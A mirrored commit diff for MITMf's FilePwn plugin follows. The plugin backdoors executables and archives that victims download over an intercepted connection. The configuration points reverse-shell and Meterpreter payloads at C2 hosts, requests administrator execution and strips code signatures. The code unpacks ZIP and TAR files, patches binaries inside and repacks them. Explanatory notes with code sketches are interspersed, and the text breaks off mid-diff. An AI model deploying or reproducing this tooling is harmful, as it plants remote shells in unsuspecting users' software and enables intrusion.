mirror of https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00

Updated Filepwn plugin to the latest BDFactory & BDFProxy version

parent 1a50f000c1
commit 1a5c7c03b7

6 changed files with 542 additions and 508 deletions
@@ -7,4 +7,4 @@ before_install:
   - "sudo apt-get install libpcap0.8-dev libnetfilter-queue-dev"
 install: "pip install -r requirements.txt"
 script: python tests/basic_tests.py
@@ -334,172 +334,186 @@
 [FilePwn]

-# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
 #
 # Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
 #
 # Copyright (c) 2013-2014, Joshua Pitts
 # All rights reserved.
 #
 # Redistribution and use in source and binary forms, with or without modification,
 # are permitted provided that the following conditions are met:
 #
 # 1. Redistributions of source code must retain the above copyright notice,
 # this list of conditions and the following disclaimer.
 #
 # 2. Redistributions in binary form must reproduce the above copyright notice,
 # this list of conditions and the following disclaimer in the documentation
 # and/or other materials provided with the distribution.
 #
 # 3. Neither the name of the copyright holder nor the names of its contributors
 # may be used to endorse or promote products derived from this software without
 # specific prior written permission.
 #
 # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
 # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 # POSSIBILITY OF SUCH DAMAGE.
 #
-# Tested on Kali-Linux.

 [[hosts]]
 #whitelist host/IP - patch these only.
 #ALL is everything, use the blacklist to leave certain hosts/IPs out

 whitelist = ALL

 #Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.

 blacklist = , # a comma is null do not leave blank


 [[keywords]]
 #These checks look at the path of a url for keywords

 whitelist = ALL

 #For blacklist note binaries that you do not want to touch at all

 # Also applied in zip files

-blacklist = Tcpview.exe, skype.exe, .dll
+blacklist = .dll

 [[ZIP]]
 # patchCount is the max number of files to patch in a zip file
 # After the max is reached it will bypass the rest of the files
 # and send on it's way

 patchCount = 5

 # In Bytes
-maxSize = 40000000
+maxSize = 50000000

 blacklist = .dll, #don't do dlls in a zip file

 [[TAR]]
 # patchCount is the max number of files to patch in a tar file
 # After the max is reached it will bypass the rest of the files
 # and send on it's way

 patchCount = 5

 # In Bytes
-maxSize = 40000000
+maxSize = 10000000

 blacklist = , # a comma is null do not leave blank

 [[targets]]
 #MAKE SURE that your settings for host and port DO NOT
 # overlap between different types of payloads

 [[[ALL]]] # DEFAULT settings for all targets REQUIRED

 LinuxType = ALL # choices: x86/x64/ALL/None
 WindowsType = ALL # choices: x86/x64/ALL/None
 FatPriority = x64 # choices: x86 or x64

-FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
+FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large

 CompressedFiles = True #True/False

 [[[[LinuxIntelx86]]]]
 SHELL = reverse_shell_tcp # This is the BDF syntax
 HOST = 192.168.1.168 # The C2
 PORT = 8888
 SUPPLIED_SHELLCODE = None
 MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax

 [[[[LinuxIntelx64]]]]
 SHELL = reverse_shell_tcp
 HOST = 192.168.1.16
 PORT = 9999
 SUPPLIED_SHELLCODE = None
 MSFPAYLOAD = linux/x64/shell_reverse_tcp

 [[[[WindowsIntelx86]]]]
-PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
-# PATCH_METHOD overwrites PATCH_TYPE with jump
+PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
 PATCH_METHOD =
-HOST = 172.16.206.7
-PORT = 8444
-SHELL = iat_reverse_tcp_stager_threaded
-SUPPLIED_SHELLCODE = None
-ZERO_CERT = False
-PATCH_DLL = True
+HOST = 192.168.1.16
+PORT = 8090
+# SHELL for use with automatic PATCH_METHOD
+SHELL = iat_reverse_tcp_inline_threaded
+# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
+SUPPLIED_SHELLCODE = None
+ZERO_CERT = True
+# PATCH_DLLs as they come across
+PATCH_DLL = False
+# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
+RUNAS_ADMIN = True
+# XP_MODE - to support XP targets
+XP_MODE = True
+# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
+# with PATCH_METHOD 'replace' use an EXE not DLL
+SUPPLIED_BINARY = veil_go_payload.exe
 MSFPAYLOAD = windows/meterpreter/reverse_tcp

 [[[[WindowsIntelx64]]]]
 PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
-# PATCH_METHOD overwrites PATCH_TYPE with jump
-PATCH_METHOD =
-HOST = 172.16.206.1
+# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
+PATCH_METHOD = automatic
+HOST = 192.168.1.16
 PORT = 8088
-SHELL = iat_reverse_tcp_stager_threaded
-SUPPLIED_SHELLCODE = None
-ZERO_CERT = True
-PATCH_DLL = False
+# SHELL for use with automatic PATCH_METHOD
+SHELL = iat_reverse_tcp_stager_threaded
+# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
+SUPPLIED_SHELLCODE = None
+ZERO_CERT = True
+PATCH_DLL = True
+# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
+RUNAS_ADMIN = True
+# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
+# with PATCH_METHOD 'replace' use an EXE not DLL
+SUPPLIED_BINARY = pentest_x64_payload.exe
 MSFPAYLOAD = windows/x64/shell/reverse_tcp

 [[[[MachoIntelx86]]]]
 SHELL = reverse_shell_tcp
 HOST = 192.168.1.16
 PORT = 4444
 SUPPLIED_SHELLCODE = None
 MSFPAYLOAD = linux/x64/shell_reverse_tcp

 [[[[MachoIntelx64]]]]
 SHELL = reverse_shell_tcp
 HOST = 192.168.1.16
 PORT = 5555
 SUPPLIED_SHELLCODE = None
 MSFPAYLOAD = linux/x64/shell_reverse_tcp

 # Call out the difference for targets here as they differ from ALL
 # These settings override the ALL settings

 [[[sysinternals.com]]]
 LinuxType = None
-WindowsType = x86
+WindowsType = ALL
 CompressedFiles = False
 #inherits WindowsIntelx32 from ALL
 [[[[WindowsIntelx86]]]]
 PATCH_DLL = False
 ZERO_CERT = True

 [[[sourceforge.org]]]
 WindowsType = x64
 CompressedFiles = False

 [[[[WindowsIntelx64]]]]
 PATCH_DLL = False

 [[[[WindowsIntelx86]]]]
 PATCH_DLL = False
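Note: the nested [[section]] syntax above is the ConfigObj dialect that MITMf's config loader appears to use. As a quick orientation, a minimal sketch of reading these values (assuming the configobj package; the file path is hypothetical, and values come back as strings):

    from configobj import ConfigObj

    config = ConfigObj('mitmf.conf')    # path is an assumption
    filepwn = config['FilePwn']

    print filepwn['hosts']['whitelist']                                   # 'ALL'
    print filepwn['ZIP']['maxSize']                                       # '50000000'
    print filepwn['targets']['ALL']['WindowsIntelx86']['PORT']            # '8090'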
@@ -111,8 +111,6 @@ class ProxyPlugins:
             for f in self.plugin_mthds[fname]:
                 a = f(**args)
                 if a != None: args = a
-        except KeyError as e:
-            pass
         except Exception as e:
             #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
             log.error("Exception occurred in hooked function")
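Note: with the KeyError handler deleted, a missing hook name now falls through to the generic Exception handler and gets logged instead of being silently swallowed. For context, a minimal standalone sketch of the hook-chaining contract the surviving lines implement (names illustrative): each hook receives the current kwargs, and a hook that returns a dict replaces the kwargs seen by the next hook.

    plugin_mthds = {'response': []}     # hook name -> list of callables

    def add_proto(**kwargs):
        # example hook: rewrites one field and hands the state back
        kwargs['url'] = 'http://' + kwargs['url']
        return kwargs

    plugin_mthds['response'].append(add_proto)

    def hook(fname, **args):
        for f in plugin_mthds[fname]:
            a = f(**args)
            if a is not None:
                args = a                # returned dict becomes the next hook's input
        return args

    print hook('response', url='example.com')   # {'url': 'http://example.com'}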
@@ -1 +1 @@
-Subproject commit 7a19089bd9620e736a56ecde145206cec261cc67
+Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5
@@ -61,11 +61,13 @@ import pefile
 import zipfile
 import logging
 import shutil
+import tempfile
 import random
 import string
 import threading
 import multiprocessing
 import tarfile
+import magic

 from libs.bdfactory import pebin
 from libs.bdfactory import elfbin
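Note: the new import magic is python-magic (added to requirements.txt later in this diff); it sniffs a buffer's MIME type from its leading bytes, replacing the hand-rolled magic-number table removed in the next hunk. A minimal sketch (file name hypothetical):

    import magic

    with open('some_download.exe', 'rb') as f:   # file name hypothetical
        data = f.read()

    print magic.from_buffer(data, mime=True)     # e.g. 'application/x-dosexec'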
@@ -90,37 +92,23 @@ class FilePwn(Plugin):
         from core.msfrpc import Msf
         self.msf = Msf()

-        #FOR FUTURE USE
-        self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
-        #FOR FUTURE USE
-        self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
-
-        #USED NOW
-        self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
-                             'pe': {'number': 'MZ', 'offset': 0},
-                             'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
-                             'bz': {'number': 'BZ', 'offset': 0},
-                             'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
-                             'tar': {'number': 'ustar', 'offset': 257},
-                             'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
-                             'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
-                             'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
-                             }
-
-        #NOT USED NOW
-        self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
+        self.binaryMimeType = {'mimes': ['application/octet-stream', 'application/x-msdownload',
+                                         'application/x-msdos-program', 'binary/octet-stream',
+                                         'application/x-executable', 'application/x-dosexec']}
+
+        self.zipType = {'mimes': ['application/x-zip-compressed', 'application/zip'], 'params': {'type': 'ZIP', 'format': 'zip', 'filter': None}}  # .zip
+
+        self.gzType = {'mimes': ['application/gzip', 'application/x-gzip', 'application/gnutar'], 'params': {'type': 'TAR', 'format': 'ustar', 'filter': 'gzip'}}  # .gz
+
+        self.tarType = {'mimes': ['application/x-tar'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': None}}  # .tar
+
+        self.bzType = {'mimes': ['application/x-bzip2', 'application/x-bzip'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': 'bzip2'}}  # .bz / .bz2
+
+        self.archiveTypes = [self.zipType, self.gzType, self.tarType, self.bzType]

         #FilePwn options
-        self.userConfig = self.config['FilePwn']
-        self.hostblacklist = self.userConfig['hosts']['blacklist']
-        self.hostwhitelist = self.userConfig['hosts']['whitelist']
-        self.keysblacklist = self.userConfig['keywords']['blacklist']
-        self.keyswhitelist = self.userConfig['keywords']['whitelist']
-        self.zipblacklist = self.userConfig['ZIP']['blacklist']
-        self.tarblacklist = self.userConfig['TAR']['blacklist']
-        self.parse_target_config(self.userConfig['targets']['ALL'])
+        self.set_config()
+        self.parse_target_config(self.user_config['targets']['ALL'])

         self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))
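Note: the new archiveTypes list acts as a dispatch table from a sniffed MIME type to archive-handling parameters. A condensed, self-contained sketch of how it is consumed (this mirrors the response() logic later in this diff; the two dicts are abbreviated stand-ins for the real entries and the file name is hypothetical):

    import magic

    zip_type = {'mimes': ['application/zip'], 'params': {'type': 'ZIP', 'format': 'zip', 'filter': None}}
    tar_type = {'mimes': ['application/x-tar'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': None}}
    archive_types = [zip_type, tar_type]

    data = open('download.tar', 'rb').read()     # file name hypothetical
    mime_type = magic.from_buffer(data, mime=True)

    for archive in archive_types:
        if mime_type in archive['mimes']:
            # params select ZIP vs TAR handling and the compression filter
            print 'dispatching to the {0} handler'.format(archive['params']['type'])
            break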
@@ -142,19 +130,209 @@ class FilePwn(Plugin):
     def on_config_change(self):
         self.initialize(self.options)

-    def convert_to_Bool(self, aString):
-        if aString.lower() == 'true':
+    def str2bool(self, val):
+        if val.lower() == 'true':
             return True
-        elif aString.lower() == 'false':
+        elif val.lower() == 'false':
             return False
-        elif aString.lower() == 'none':
+        else:
             return None

-    def bytes_have_format(self, bytess, formatt):
-        number = self.magicNumbers[formatt]
-        if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
-            return True
-        return False
+    def inject(self, data):
+        if len(data) > self.archive_max_size:
+            self.log.error("{0} over allowed size".format(self.archive_type))
+            return data
+
+        buf = None
+
+        if self.archive_type == "ZIP":
+            buf = self.inject_zip(data)
+        elif self.archive_type == "TAR":
+            buf = self.inject_tar(data, self.archive_params['filter'])
+
+        return buf
+
+    def inject_tar(self, aTarFileBytes, formatt=None):
+        # When called will unpack and edit a Tar File and return a tar file"
+        tmp_file = tempfile.NamedTemporaryFile()
+        tmp_file.write(aTarFileBytes)
+        tmp_file.seek(0)
+
+        compression_mode = ':'
+        if formatt == 'gzip':
+            compression_mode = ':gz'
+        if formatt == 'bzip2':
+            compression_mode = ':bz2'
+
+        try:
+            tar_file = tarfile.open(fileobj=tmp_file, mode='r' + compression_mode)
+        except tarfile.ReadError as ex:
+            self.log.warning(ex)
+            tmp_file.close()
+            return aTarFileBytes
+
+        self.log.info("TarFile contents and info (compression: {0}):".format(formatt))
+
+        members = tar_file.getmembers()
+        for info in members:
+            print "\t{0} {1}".format(info.name, info.size)
+
+        new_tar_storage = tempfile.NamedTemporaryFile()
+        new_tar_file = tarfile.open(mode='w' + compression_mode, fileobj=new_tar_storage)
+
+        patch_count = 0
+        was_patched = False
+
+        for info in members:
+            self.log.info(">>> Next file in tarfile: {0}".format(info.name))
+
+            if not info.isfile():
+                self.log.warning("{0} is not a file, skipping".format(info.name))
+                new_tar_file.addfile(info, tar_file.extractfile(info))
+                continue
+
+            if info.size >= long(self.FileSizeMax):
+                self.log.warning("{0} is too big, skipping".format(info.name))
+                new_tar_file.addfile(info, tar_file.extractfile(info))
+                continue
+
+            # Check against keywords
+            if self.check_keyword(info.name.lower()) is True:
+                self.log.info('Tar blacklist enforced on {0}'.format(info.name))
+                continue
+
+            # Try to patch
+            extracted_file = tar_file.extractfile(info)
+
+            if patch_count >= self.archive_patch_count:
+                self.log.info("Met archive config patchCount limit. Adding original file")
+                new_tar_file.addfile(info, extracted_file)
+            else:
+                # create the file on disk temporarily for fileGrinder to run on it
+                with tempfile.NamedTemporaryFile() as tmp:
+                    shutil.copyfileobj(extracted_file, tmp)
+                    tmp.flush()
+                    patch_result = self.binaryGrinder(tmp.name)
+                    if patch_result:
+                        patch_count += 1
+                        file2 = os.path.join(BDFOLDER, os.path.basename(tmp.name))
+                        self.log.info("{0} in archive patched, adding to final archive".format(info.name))
+                        info.size = os.stat(file2).st_size
+                        with open(file2, 'rb') as f:
+                            new_tar_file.addfile(info, f)
+                        os.remove(file2)
+                        was_patched = True
+                    else:
+                        self.log.info("{0} patching failed. Keeping original file.".format(info.name))
+                        with open(tmp.name, 'rb') as f:
+                            new_tar_file.addfile(info, f)
+
+        # finalize the writing of the tar file first
+        new_tar_file.close()
+
+        if was_patched is False:
+            # If nothing was changed return the original
+            self.log.info("No files were patched. Forwarding original file")
+            new_tar_storage.close()  # it's automatically deleted
+            return aTarFileBytes
+
+        # then read the new tar file into memory
+        new_tar_storage.seek(0)
+        buf = new_tar_storage.read()
+        new_tar_storage.close()  # it's automatically deleted
+
+        return buf
+
+    def inject_zip(self, aZipFile):
+        # When called will unpack and edit a Zip File and return a zip file
+        tmp_file = tempfile.NamedTemporaryFile()
+        tmp_file.write(aZipFile)
+        tmp_file.seek(0)
+
+        zippyfile = zipfile.ZipFile(tmp_file.name, 'r')
+
+        # encryption test
+        try:
+            zippyfile.testzip()
+        except RuntimeError as e:
+            if 'encrypted' in str(e):
+                self.log.warning("Encrypted zipfile found. Not patching.")
+            else:
+                self.log.warning("Zipfile test failed. Returning original archive")
+            zippyfile.close()
+            tmp_file.close()
+            return aZipFile
+
+        self.log.info("ZipFile contents and info:")
+
+        for info in zippyfile.infolist():
+            print "\t{0} {1}".format(info.filename, info.file_size)
+
+        tmpDir = tempfile.mkdtemp()
+        zippyfile.extractall(tmpDir)
+
+        patch_count = 0
+        was_patched = False
+
+        for info in zippyfile.infolist():
+            self.log.info(">>> Next file in zipfile: {0}".format(info.filename))
+            actual_file = os.path.join(tmpDir, info.filename)
+
+            if os.path.islink(actual_file) or not os.path.isfile(actual_file):
+                self.log.warning("{0} is not a file, skipping".format(info.filename))
+                continue
+
+            if os.lstat(actual_file).st_size >= long(self.FileSizeMax):
+                self.log.warning("{0} is too big, skipping".format(info.filename))
+                continue
+
+            # Check against keywords
+            if self.check_keyword(info.filename.lower()) is True:
+                self.log.info('Zip blacklist enforced on {0}'.format(info.filename))
+                continue
+
+            if patch_count >= self.archive_patch_count:
+                self.log.info("Met archive config patchCount limit. Adding original file")
+                break
+            else:
+                patch_result = self.binaryGrinder(actual_file)
+                if patch_result:
+                    patch_count += 1
+                    file2 = os.path.join(BDFOLDER, os.path.basename(info.filename))
+                    self.log.info("Patching complete, adding to archive file.")
+                    shutil.copyfile(file2, actual_file)
+                    self.log.info("{0} in archive patched, adding to final archive".format(info.filename))
+                    os.remove(file2)
+                    was_patched = True
+                else:
+                    self.log.error("{0} patching failed. Keeping original file.".format(info.filename))

+        zippyfile.close()
+
+        if was_patched is False:
+            self.log.info("No files were patched. Forwarding original file")
+            tmp_file.close()
+            shutil.rmtree(tmpDir, ignore_errors=True)
+            return aZipFile
+
+        zip_result = zipfile.ZipFile(tmp_file.name, 'w', zipfile.ZIP_DEFLATED)
+
+        for base, dirs, files in os.walk(tmpDir):
+            for afile in files:
+                filename = os.path.join(base, afile)
+                zip_result.write(filename, arcname=filename.replace(tmpDir + '/', ''))
+
+        zip_result.close()
+        # clean up
+        shutil.rmtree(tmpDir, ignore_errors=True)
+
+        with open(tmp_file.name, 'rb') as f:
+            zip_data = f.read()
+            tmp_file.close()
+
+        return zip_data

     def binaryGrinder(self, binaryFile):
         """
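Note: inject_tar() and inject_zip() share the same unpack-patch-repack shape. A self-contained sketch of just the tempfile + tarfile round-trip, with the patching step omitted (function and argument names are illustrative):

    import tarfile
    import tempfile

    def repack_tar(tar_bytes, compression=''):      # '' or ':gz' or ':bz2'
        src = tempfile.NamedTemporaryFile()
        src.write(tar_bytes)
        src.seek(0)
        tar_in = tarfile.open(fileobj=src, mode='r' + compression)

        dst = tempfile.NamedTemporaryFile()
        tar_out = tarfile.open(fileobj=dst, mode='w' + compression)
        for member in tar_in.getmembers():
            # regular files carry a payload; directories and links do not
            payload = tar_in.extractfile(member) if member.isfile() else None
            tar_out.addfile(member, payload)
        tar_out.close()                             # finalize before reading back

        dst.seek(0)
        buf = dst.read()
        dst.close()                                 # NamedTemporaryFile deletes itself
        src.close()
        return buf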
@@ -174,66 +352,72 @@ class FilePwn(Plugin):
         magic = pe.OPTIONAL_HEADER.Magic
         machineType = pe.FILE_HEADER.Machine

-        #update when supporting more than one arch
+        # update when supporting more than one arch
         if (magic == int('20B', 16) and machineType == 0x8664 and
            self.WindowsType.lower() in ['all', 'x64']):
             add_section = False
             cave_jumping = False
             if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
                 add_section = True
             elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
                 cave_jumping = True

             # if automatic override
             if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
                 cave_jumping = True

             targetFile = pebin.pebin(FILE=binaryFile,
                                      OUTPUT=os.path.basename(binaryFile),
                                      SHELL=self.WindowsIntelx64['SHELL'],
                                      HOST=self.WindowsIntelx64['HOST'],
                                      PORT=int(self.WindowsIntelx64['PORT']),
                                      ADD_SECTION=add_section,
                                      CAVE_JUMPING=cave_jumping,
                                      IMAGE_TYPE=self.WindowsType,
-                                     PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
-                                     SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
-                                     ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
-                                     PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
+                                     RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
+                                     PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']),
+                                     SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
+                                     ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']),
+                                     PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower(),
+                                     SUPPLIED_BINARY=self.WindowsIntelx64['SUPPLIED_BINARY'],
                                      )

             result = targetFile.run_this()

         elif (machineType == 0x14c and
               self.WindowsType.lower() in ['all', 'x86']):
             add_section = False
             cave_jumping = False
-            #add_section wins for cave_jumping
-            #default is single for BDF
+            # add_section wins for cave_jumping
+            # default is single for BDF
             if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
                 add_section = True
             elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
                 cave_jumping = True

             # if automatic override
             if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
                 cave_jumping = True

             targetFile = pebin.pebin(FILE=binaryFile,
                                      OUTPUT=os.path.basename(binaryFile),
                                      SHELL=self.WindowsIntelx86['SHELL'],
                                      HOST=self.WindowsIntelx86['HOST'],
                                      PORT=int(self.WindowsIntelx86['PORT']),
                                      ADD_SECTION=add_section,
                                      CAVE_JUMPING=cave_jumping,
                                      IMAGE_TYPE=self.WindowsType,
-                                     PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
-                                     SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
-                                     ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
-                                     PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
+                                     RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
+                                     PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']),
+                                     SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
+                                     ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']),
+                                     PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower(),
+                                     SUPPLIED_BINARY=self.WindowsIntelx86['SUPPLIED_BINARY'],
+                                     XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE'])
                                      )

             result = targetFile.run_this()

         elif binaryHeader[:4].encode('hex') == '7f454c46':  # ELF
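Note: for orientation, the PE architecture test above relies on standard pefile fields and PE header constants (OPTIONAL_HEADER.Magic 0x10B = PE32, 0x20B = PE32+; FILE_HEADER.Machine 0x14c = i386, 0x8664 = AMD64). A minimal sketch (path hypothetical):

    import pefile

    pe = pefile.PE('target.exe')                   # path hypothetical
    if pe.OPTIONAL_HEADER.Magic == 0x20B and pe.FILE_HEADER.Machine == 0x8664:
        print 'PE32+ (x64) binary'
    elif pe.FILE_HEADER.Machine == 0x14c:
        print 'PE32 (x86) binary'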
@@ -241,7 +425,7 @@ class FilePwn(Plugin):
             targetFile.support_check()

             if targetFile.class_type == 0x1:
-                #x86CPU Type
+                # x86CPU Type
                 targetFile = elfbin.elfbin(FILE=binaryFile,
                                            OUTPUT=os.path.basename(binaryFile),
                                            SHELL=self.LinuxIntelx86['SHELL'],
@@ -252,7 +436,7 @@ class FilePwn(Plugin):
                                            )
                 result = targetFile.run_this()
             elif targetFile.class_type == 0x2:
-                #x64
+                # x64
                 targetFile = elfbin.elfbin(FILE=binaryFile,
                                            OUTPUT=os.path.basename(binaryFile),
                                            SHELL=self.LinuxIntelx64['SHELL'],
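Note: the class_type values checked above (0x1 = 32-bit, 0x2 = 64-bit) correspond to the EI_CLASS byte of the ELF identification header, which sits at offset 4 right after the \x7fELF magic. A raw-bytes sketch of the same test (path hypothetical):

    with open('target_elf', 'rb') as f:            # path hypothetical
        ident = f.read(5)

    if ident[:4] == '\x7fELF':
        ei_class = ord(ident[4])                   # 1 = ELFCLASS32, 2 = ELFCLASS64
        print 'x86' if ei_class == 0x1 else 'x64' if ei_class == 0x2 else 'unknown'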
@@ -267,7 +451,7 @@ class FilePwn(Plugin):
             targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
             targetFile.support_check()

-            #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
+            # ONE CHIP SET MUST HAVE PRIORITY in FAT FILE

             if targetFile.FAT_FILE is True:
                 if self.FatPriority == 'x86':
@@ -314,343 +498,180 @@ class FilePwn(Plugin):
                                                )
             result = targetFile.run_this()

-            self.patched.put(result)
-            return
+            return result

         except Exception as e:
-            print 'Exception', str(e)
-            self.log.warning("EXCEPTION IN binaryGrinder {}".format(e))
+            self.log.error("Exception in binaryGrinder {0}".format(e))
             return None

-    def tar_files(self, aTarFileBytes, formatt):
-        "When called will unpack and edit a Tar File and return a tar file"
-
-        print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
-
-        if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
-            print "[!] TarFile over allowed size"
-            self.log.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
-            self.patched.put(aTarFileBytes)
-            return
-
-        with tempfile.NamedTemporaryFile() as tarFileStorage:
-            tarFileStorage.write(aTarFileBytes)
-            tarFileStorage.flush()
-
-            if not tarfile.is_tarfile(tarFileStorage.name):
-                print '[!] Not a tar file'
-                self.patched.put(aTarFileBytes)
-                return
-
-            compressionMode = ':'
-            if formatt == 'gz':
-                compressionMode = ':gz'
-            if formatt == 'bz':
-                compressionMode = ':bz2'
-
-            tarFile = None
-            try:
-                tarFileStorage.seek(0)
-                tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
-            except tarfile.ReadError:
-                pass
-
-            if tarFile is None:
-                print '[!] Not a tar file'
-                self.patched.put(aTarFileBytes)
-                return
-
-            print '[*] Tar file contents and info:'
-            print '[*] Compression:', formatt
-
-            members = tarFile.getmembers()
-            for info in members:
-                print "\t", info.name, info.mtime, info.size
-
-            newTarFileStorage = tempfile.NamedTemporaryFile()
-            newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
-
-            patchCount = 0
-            wasPatched = False
-
-            for info in members:
-                print "[*] >>> Next file in tarfile:", info.name
-
-                if not info.isfile():
-                    print info.name, 'is not a file'
-                    newTarFile.addfile(info, tarFile.extractfile(info))
-                    continue
-
-                if info.size >= long(self.FileSizeMax):
-                    print info.name, 'is too big'
-                    newTarFile.addfile(info, tarFile.extractfile(info))
-                    continue
-
-                # Check against keywords
-                keywordCheck = True
-
-                if type(self.tarblacklist) is str:
-                    if self.tarblacklist.lower() in info.name.lower():
-                        keywordCheck = True
-                else:
-                    for keyword in self.tarblacklist:
-                        if keyword.lower() in info.name.lower():
-                            keywordCheck = True
-                            continue
-
-                if keywordCheck is True:
-                    print "[!] Tar blacklist enforced!"
-                    self.log.info('Tar blacklist enforced on {}'.format(info.name))
-                    continue
-
-                # Try to patch
-                extractedFile = tarFile.extractfile(info)
-
-                if patchCount >= int(self.userConfig['TAR']['patchCount']):
-                    newTarFile.addfile(info, extractedFile)
-                else:
-                    # create the file on disk temporarily for fileGrinder to run on it
-                    with tempfile.NamedTemporaryFile() as tmp:
-                        shutil.copyfileobj(extractedFile, tmp)
-                        tmp.flush()
-                        patchResult = self.binaryGrinder(tmp.name)
-                        if patchResult:
-                            patchCount += 1
-                            file2 = "backdoored/" + os.path.basename(tmp.name)
-                            print "[*] Patching complete, adding to tar file."
-                            info.size = os.stat(file2).st_size
-                            with open(file2, 'rb') as f:
-                                newTarFile.addfile(info, f)
-                            self.log.info("{} in tar patched, adding to tarfile".format(info.name))
-                            os.remove(file2)
-                            wasPatched = True
-                        else:
-                            print "[!] Patching failed"
-                            with open(tmp.name, 'rb') as f:
-                                newTarFile.addfile(info, f)
-                            self.log.info("{} patching failed. Keeping original file in tar.".format(info.name))
-                if patchCount == int(self.userConfig['TAR']['patchCount']):
-                    self.log.info("Met Tar config patchCount limit.")
-
-            # finalize the writing of the tar file first
-            newTarFile.close()
-
-            # then read the new tar file into memory
-            newTarFileStorage.seek(0)
-            ret = newTarFileStorage.read()
-            newTarFileStorage.close()  # it's automatically deleted
-
-            if wasPatched is False:
-                # If nothing was changed return the original
-                print "[*] No files were patched forwarding original file"
-                self.patched.put(aTarFileBytes)
-                return
-            else:
-                self.patched.put(ret)
-                return
-
-    def zip_files(self, aZipFile):
-        "When called will unpack and edit a Zip File and return a zip file"
-
